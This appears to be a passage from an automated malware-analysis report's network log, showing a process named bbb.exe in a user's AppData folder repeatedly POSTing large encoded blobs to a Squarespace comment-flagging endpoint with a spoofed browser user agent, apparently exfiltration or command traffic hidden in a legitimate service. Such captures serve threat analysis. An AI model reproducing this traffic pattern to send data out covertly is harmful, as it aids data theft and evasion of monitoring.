2024-09-01 19:56:49 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 78 4c 54 66 4a 50 50 42 63 75 72 48 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 68 6c Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YxLTfJPPBcurHbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQwhl
2024-09-01 19:56:49 UTC	1	OUT	Data Raw: 48 Data Ascii: H
2024-09-01 19:56:49 UTC	16306	OUT	Data Raw: 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f 42 70 Data Ascii: J8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTcoBp
2024-09-01 19:56:49 UTC	1	OUT	Data Raw: 6c Data Ascii: l
2024-09-01 19:56:49 UTC	16306	OUT	Data Raw: 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c 56 31 Data Ascii: abaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9clV1
2024-09-01 19:56:49 UTC	1	OUT	Data Raw: 39 Data Ascii: 9
2024-09-01 19:56:49 UTC	16306	OUT	Data Raw: 50 41 79 56 6e 73 58 67 45 47 6e 38 74 59 6a 32 68 4b 59 68 77 69 46 39 34 6c 38 69 2f 6d 6e 68 44 39 37 37 74 42 63 74 51 52 6e 45 44 52 43 56 75 77 6c 38 73 6f 7a 4c 54 4a 6a 4a 61 37 37 50 47 6c 4f 79 5a 70 4c 2f 6e 35 4a 63 6b 6f 44 25 32 42 71 51 45 61 45 7a 49 43 77 31 4e 37 7a 4c 34 6b 4c 34 70 64 6d 63 66 45 69 51 6e 61 57 32 4c 4e 67 55 73 78 31 67 2f 79 4c 66 2f 5a 47 39 39 37 6a 5a 57 50 36 44 69 54 56 50 44 44 31 38 4d 79 46 34 42 6d 58 67 35 65 37 41 6e 4f 4e 58 6f 25 32 42 54 77 49 58 4a 43 6a 6b 50 73 63 53 25 32 42 50 49 59 67 4f 37 44 34 5a 55 30 39 47 44 52 4f 76 47 53 53 76 4f 65 79 49 55 34 36 70 57 72 67 66 76 37 6c 57 72 4c 66 32 57 58 74 38 46 63 6a 5a 6d 6c 63 39 4e 61 6b 35 5a 41 70 4c 58 4c 4d 7a 74 39 6b 73 4a 44 4e 77 67 7a 37 Data Ascii: PAyVnsXgEGn8tYj2hKYhwiF94l8i/mnhD977tBctQRnEDRCVuwl8sozLTJjJa77PGlOyZpL/n5JckoD%2BqQEaEzICw1N7zL4kL4pdmcfEiQnaW2LNgUsx1g/yLf/ZG997jZWP6DiTVPDD18MyF4BmXg5e7AnONXo%2BTwIXJCjkPscS%2BPIYgO7D4ZU09GDROvGSSvOeyIU46pWrgfv7lWrLf2WXt8FcjZmlc9Nak5ZApLXLMzt9ksJDNwgz7
2024-09-01 19:56:49 UTC	1	OUT	Data Raw: 64 Data Ascii: d
2024-09-01 19:56:49 UTC	16306	OUT	Data Raw: 55 50 47 31 59 6c 6d 66 42 4b 46 52 32 64 57 50 63 32 4a 44 77 4c 4d 41 38 36 30 66 58 65 48 55 64 43 30 52 4b 50 41 54 47 55 6f 70 58 42 7a 59 53 4b 55 33 45 50 32 62 76 43 79 41 45 75 77 61 50 55 69 71 6e 62 61 6d 31 62 78 45 69 50 4a 70 53 57 47 33 71 78 57 32 58 77 71 43 4f 6e 25 32 42 52 6b 77 77 57 6f 66 36 34 6e 37 54 45 38 75 41 6b 4e 6d 47 44 59 39 59 42 4d 4c 44 6f 4e 71 48 32 36 50 39 4a 6b 6c 48 47 51 59 57 44 42 53 74 4d 63 4d 32 52 63 33 55 65 41 78 4f 75 42 32 32 71 52 65 65 6e 66 25 32 42 42 4c 73 59 61 4a 52 53 58 51 6c 66 52 4f 25 32 42 4e 55 6d 4c 41 54 78 34 6a 4c 37 63 4b 78 46 33 7a 4b 53 52 43 58 61 46 78 74 6e 4f 78 70 4a 50 78 61 25 32 42 78 4f 34 52 52 53 45 4b 64 6a 55 6e 54 52 35 25 32 42 35 32 64 4e 39 4c 53 47 37 43 68 67 51 Data Ascii: UPG1YlmfBKFR2dWPc2JDwLMA860fXeHUdC0RKPATGUopXBzYSKU3EP2bvCyAEuwaPUiqnbam1bxEiPJpSWG3qxW2XwqCOn%2BRkwwWof64n7TE8uAkNmGDY9YBMLDoNqH26P9JklHGQYWDBStMcM2Rc3UeAxOuB22qReenf%2BBLsYaJRSXQlfRO%2BNUmLATx4jL7cKxF3zKSRCXaFxtnOxpJPxa%2BxO4RRSEKdjUnTR5%2B52dN9LSG7ChgQ
2024-09-01 19:56:49 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:49 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BcjQFkTOvIJ5OThmMmEwOWQ0YTg0MGM4ZGM0ZGU4ZTFmNDE3Zjky; Path=/; Secure Set-Cookie: crumb=BUlfn4KrvDEFOWMxYzk1ZjEyOWJhZDU0YzllZDIwNjkyZWFkYjU0; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: Se1cGtaE/avYKiC8a Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BUlfn4KrvDEFOWMxYzk1ZjEyOWJhZDU0YzllZDIwNjkyZWFkYjU0"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
92	192.168.2.4	49849	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:49 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:49 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:49 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:49 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:50 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:49 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BVfCMpOYyp6GMzAxODk3MzJmOWI1OWUxMTQ1OTQwYWYyZDllMzU4; Path=/; Secure Set-Cookie: crumb=BRkqNe_g-3xGMWQ2YzQ3MTRmZDM5MmJkZmJlYWJkNWZiOWU4NTNi; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: urvQdsWU/Sz51ZgHa Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BRkqNe_g-3xGMWQ2YzQ3MTRmZDM5MmJkZmJlYWJkNWZiOWU4NTNi"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
93	192.168.2.4	49850	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:50 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:50 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:50 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:50 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:50 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BbsjvlUkICLyNmRlYjJjNzI1MTIwZjliY2UyMjQ4ODVhY2RhZmQ4; Path=/; Secure Set-Cookie: crumb=BdWsVLKEKDpqMDE3NTg3OGY4NzFiYmQ5NzNmYzRlYjcxOWU4NzM4; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: cJ3zfCw2/vCIgE95w Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BdWsVLKEKDpqMDE3NTg3OGY4NzFiYmQ5NzNmYzRlYjcxOWU4NzM4"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
94	192.168.2.4	49851	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:50 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 326 Expect: 100-continue
2024-09-01 19:56:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:50 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:50 UTC	325	OUT	Data Raw: 3d 66 4c 74 30 72 76 63 61 63 36 34 25 32 42 45 48 38 71 74 46 37 73 59 45 33 62 79 6b 47 48 39 58 25 32 42 7a 78 63 35 4b 38 35 54 4c 75 7a 54 62 6d 6e 38 66 75 34 31 70 34 2f 6d 53 6f 44 4b 76 6b 66 5a 31 50 52 7a 48 6e 43 31 4a 70 35 6e 45 59 67 74 73 4e 77 6a 68 4d 61 71 4a 37 35 75 4a 46 44 67 6a 35 37 32 76 76 54 6b 61 50 61 2f 42 25 32 42 52 56 35 37 25 32 42 38 6e 41 4a 49 77 6d 6f 45 6b 68 47 37 37 2f 42 6f 65 30 4f 5a 72 62 4b 6a 78 36 66 62 68 66 34 77 32 39 32 5a 73 79 37 64 35 56 72 52 62 6c 38 58 31 39 75 4e 38 73 6a 6d 32 73 32 68 31 72 39 4c 45 54 5a 45 47 2f 4d 6f 72 42 56 4e 33 33 67 31 53 51 4b 45 5a 72 44 72 36 45 35 55 41 46 67 30 65 53 5a 59 46 7a 7a 77 65 70 64 57 68 74 39 45 51 47 6c 6c 69 6f 6f 56 6d 41 6b 72 6c 25 32 42 2f 48 77 Data Ascii: =fLt0rvcac64%2BEH8qtF7sYE3bykGH9X%2Bzxc5K85TLuzTbmn8fu41p4/mSoDKvkfZ1PRzHnC1Jp5nEYgtsNwjhMaqJ75uJFDgj572vvTkaPa/B%2BRV57%2B8nAJIwmoEkhG77/Boe0OZrbKjx6fbhf4w292Zsy7d5VrRbl8X19uN8sjm2s2h1r9LETZEG/MorBVN33g1SQKEZrDr6E5UAFg0eSZYFzzwepdWht9EQGlliooVmAkrl%2B/Hw
2024-09-01 19:56:50 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:50 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BRpCC5TwXcOwYjEzMDA1Mzg2NjcxZDE4ZDg1NGU4NjkxOTZmYzRm; Path=/; Secure Set-Cookie: crumb=BeTHDACp5r0kMjM0NTZiNDI5MmYyOTczNThkNmY3MjcwY2RhNDNl; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: DeyxTFW6/Y5hSsuHR Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeTHDACp5r0kMjM0NTZiNDI5MmYyOTczNThkNmY3MjcwY2RhNDNl"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
95	192.168.2.4	49852	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:50 UTC	293	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 280 Expect: 100-continue
2024-09-01 19:56:50 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:50 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:50 UTC	279	OUT	Data Raw: 3d 70 53 61 2f 68 4f 70 34 78 41 4e 6c 59 39 69 33 63 36 25 32 42 79 6d 31 4e 70 62 65 57 4d 74 67 57 63 69 34 43 62 34 54 37 4f 4c 42 25 32 42 4f 55 45 6d 56 4f 4d 63 73 79 74 48 45 68 52 72 62 4b 59 71 64 78 53 63 50 25 32 42 30 6e 79 25 32 42 4c 74 57 64 44 48 7a 79 38 62 38 78 50 67 72 50 6d 4f 4e 68 37 50 57 65 38 61 33 39 51 30 67 32 79 31 35 31 63 76 49 56 4f 46 39 69 35 5a 6d 55 31 42 37 46 47 50 6f 47 65 47 61 54 78 34 38 69 6b 56 5a 39 58 39 52 47 50 45 79 45 4f 77 4e 50 6e 4a 5a 39 37 77 7a 2f 64 77 39 41 63 2f 4e 4e 70 4c 66 36 7a 34 56 79 47 55 52 57 70 59 48 4d 46 64 6b 57 4e 74 7a 6a 65 59 71 30 67 7a 77 68 61 4d 41 7a 48 4d 53 32 56 58 35 56 4c 6d 6a 6d 4a 45 48 32 35 65 4c 66 58 6c 45 56 61 6e 6d 52 67 46 79 6c 74 33 67 57 4f 4c 4f 55 44 Data Ascii: =pSa/hOp4xANlY9i3c6%2Bym1NpbeWMtgWci4Cb4T7OLB%2BOUEmVOMcsytHEhRrbKYqdxScP%2B0ny%2BLtWdDHzy8b8xPgrPmONh7PWe8a39Q0g2y151cvIVOF9i5ZmU1B7FGPoGeGaTx48ikVZ9X9RGPEyEOwNPnJZ97wz/dw9Ac/NNpLf6z4VyGURWpYHMFdkWNtzjeYq0gzwhaMAzHMS2VX5VLmjmJEH25eLfXlEVanmRgFylt3gWOLOUD
2024-09-01 19:56:51 UTC	680	IN	HTTP/1.1 200 OK Access-Control-Allow-Credentials: true Content-Type: application/json;charset=utf-8 Date: Sun, 01 Sep 2024 19:56:50 GMT Expires: Thu, 01 Jan 1970 00:00:00 GMT Server: Squarespace Set-Cookie: crumb=BZIoRWQlPMuYOTc0ZGIzNWVhZDA1ODJiNjg5YWRiNWJhNGIyYWU0; Path=/; Secure Set-Cookie: crumb=BeoZm2kvoUbhMjA1NjY0NTFmMmYzNjI1Y2Q0OWZkZmY4MThlYTg3; Path=/; Secure Strict-Transport-Security: max-age=15552000 X-Content-Type-Options: nosniff X-Contextid: bHmtmkwE/CqTlDYqe Content-Length: 151 Connection: close {"error":"Access Denied: Invalid session crumb","loginRequired":false,"crumbFail":true,"crumb":"BeoZm2kvoUbhMjA1NjY0NTFmMmYzNjI1Y2Q0OWZkZmY4MThlYTg3"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
96	192.168.2.4	49853	198.185.159.177	443	1196	C:\Users\user\AppData\Roaming\bbb\bbb.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-01 19:56:51 UTC	296	OUT	POST /api/comment/FlagComment HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: plantain-elk-b8pt.squarespace.com Content-Length: 108352 Expect: 100-continue
2024-09-01 19:56:51 UTC	25	IN	HTTP/1.1 100 Continue
2024-09-01 19:56:51 UTC	1	OUT	Data Raw: 70 Data Ascii: p
2024-09-01 19:56:51 UTC	16306	OUT	Data Raw: 3d 6e 55 61 46 59 5a 59 4f 2f 51 62 42 4d 70 25 32 42 71 73 50 4d 44 4f 43 31 72 56 48 6d 43 74 36 70 6c 57 73 65 37 33 72 65 51 25 32 42 6a 6a 39 46 48 79 75 62 25 32 42 76 58 39 66 4c 33 64 65 79 56 63 52 72 6f 57 4a 30 32 6c 56 6d 62 4d 51 51 72 30 35 55 7a 79 78 70 53 41 62 72 6a 4a 43 30 5a 77 6f 73 75 4f 66 54 50 62 46 46 39 32 59 78 7a 51 46 45 54 25 32 42 57 61 73 4f 58 62 62 58 32 52 25 32 42 74 34 69 59 6d 49 6d 75 48 38 67 79 74 34 4f 57 34 49 61 4d 4b 48 76 54 4c 33 30 71 61 53 54 64 37 6c 57 57 6f 71 30 75 37 2f 4a 4e 67 4c 44 47 38 70 25 32 42 65 53 35 55 71 4a 71 37 44 61 54 59 42 73 30 59 4b 52 43 4b 62 78 4d 77 6c 68 75 68 6d 33 56 6e 74 34 79 47 50 74 6a 6c 34 4a 59 44 6f 71 56 37 42 64 51 70 67 45 39 6e 64 77 52 57 25 32 42 44 55 51 77 Data Ascii: =nUaFYZYO/QbBMp%2BqsPMDOC1rVHmCt6plWse73reQ%2Bjj9FHyub%2BvX9fL3deyVcRroWJ02lVmbMQQr05UzyxpSAbrjJC0ZwosuOfTPbFF92YxzQFET%2BWasOXbbX2R%2Bt4iYmImuH8gyt4OW4IaMKHvTL30qaSTd7lWWoq0u7/JNgLDG8p%2BeS5UqJq7DaTYBs0YKRCKbxMwlhuhm3Vnt4yGPtjl4JYDoqV7BdQpgE9ndwRW%2BDUQw
2024-09-01 19:56:51 UTC	1	OUT	Data Raw: 76 Data Ascii: v
2024-09-01 19:56:51 UTC	16306	OUT	Data Raw: 49 48 4a 38 75 54 45 6a 69 35 6e 68 57 45 58 4f 54 4e 74 68 66 67 55 6a 66 42 7a 57 4a 25 32 42 4a 2f 41 32 32 4a 5a 6a 45 53 69 6d 46 65 56 46 4b 54 6b 47 30 34 53 63 67 71 75 31 38 52 77 34 48 56 6a 52 61 52 46 48 70 43 75 4a 33 69 33 45 7a 51 36 42 41 46 50 64 69 62 6c 74 4a 58 4d 64 58 43 62 52 65 63 75 4f 78 6e 6e 67 68 71 70 58 67 47 46 51 49 4c 72 52 78 6c 6b 41 69 43 33 57 7a 36 45 4f 4a 45 35 79 34 71 33 77 4c 53 51 69 35 31 78 75 53 51 59 66 68 41 6e 48 5a 4a 52 45 47 54 41 69 55 47 6b 35 47 78 70 50 41 55 4a 7a 7a 39 71 47 32 66 4c 6b 50 65 62 59 4b 43 47 41 64 42 43 56 25 32 42 2f 35 5a 66 54 67 5a 77 34 30 51 36 4a 2f 4e 56 68 4f 6d 4a 46 42 70 4f 52 73 61 54 77 46 43 6e 6f 78 57 68 61 34 49 4a 4e 6f 2f 64 53 38 54 77 63 36 35 46 6a 54 63 6f Data Ascii: IHJ8uTEji5nhWEXOTNthfgUjfBzWJ%2BJ/A22JZjESimFeVFKTkG04Scgqu18Rw4HVjRaRFHpCuJ3i3EzQ6BAFPdibltJXMdXCbRecuOxnnghqpXgGFQILrRxlkAiC3Wz6EOJE5y4q3wLSQi51xuSQYfhAnHZJREGTAiUGk5GxpPAUJzz9qG2fLkPebYKCGAdBCV%2B/5ZfTgZw40Q6J/NVhOmJFBpORsaTwFCnoxWha4IJNo/dS8Twc65FjTco
2024-09-01 19:56:51 UTC	1	OUT	Data Raw: 61 Data Ascii: a
2024-09-01 19:56:51 UTC	16306	OUT	Data Raw: 35 6c 61 62 61 61 53 50 32 53 67 4e 2f 33 34 5a 33 39 56 42 5a 52 4c 4d 37 4f 6d 32 25 32 42 71 79 73 36 63 67 44 51 72 74 55 38 67 78 32 7a 53 51 4d 77 72 4c 30 37 71 35 62 57 54 4c 43 2f 61 7a 50 4a 5a 4c 76 6b 6a 49 58 74 66 32 71 44 43 79 32 55 59 4c 44 72 4e 77 6e 6f 52 32 37 68 43 72 74 35 61 31 6f 34 71 4e 31 6d 55 35 71 51 74 6b 52 31 41 43 56 46 59 64 6b 76 50 35 5a 38 63 65 50 44 35 46 53 35 51 39 25 32 42 44 6e 65 73 6d 45 4d 78 39 74 4d 42 41 63 67 53 47 53 45 25 32 42 6c 2f 74 67 4c 67 69 53 25 32 42 32 56 67 53 51 4d 5a 38 70 63 71 42 44 66 6b 53 4b 50 61 6e 72 39 4c 48 46 33 41 48 35 31 62 7a 77 73 48 67 78 4a 63 47 62 6f 34 4e 6d 35 78 59 4e 76 49 42 38 4a 43 59 45 48 70 55 77 7a 63 73 74 65 76 4a 2f 37 4d 79 2f 49 67 70 63 67 5a 39 63 6c Data Ascii: 5labaaSP2SgN/34Z39VBZRLM7Om2%2Bqys6cgDQrtU8gx2zSQMwrL07q5bWTLC/azPJZLvkjIXtf2qDCy2UYLDrNwnoR27hCrt5a1o4qN1mU5qQtkR1ACVFYdkvP5Z8cePD5FS5Q9%2BDnesmEMx9tMBAcgSGSE%2Bl/tgLgiS%2B2VgSQMZ8pcqBDfkSKPanr9LHF3AH51bzwsHgxJcGbo4Nm5xYNvIB8JCYEHpUwzcstevJ/7My/IgpcgZ9cl
2024-09-01 19:56:51 UTC	1	OUT	Data Raw: 53 Data Ascii: S
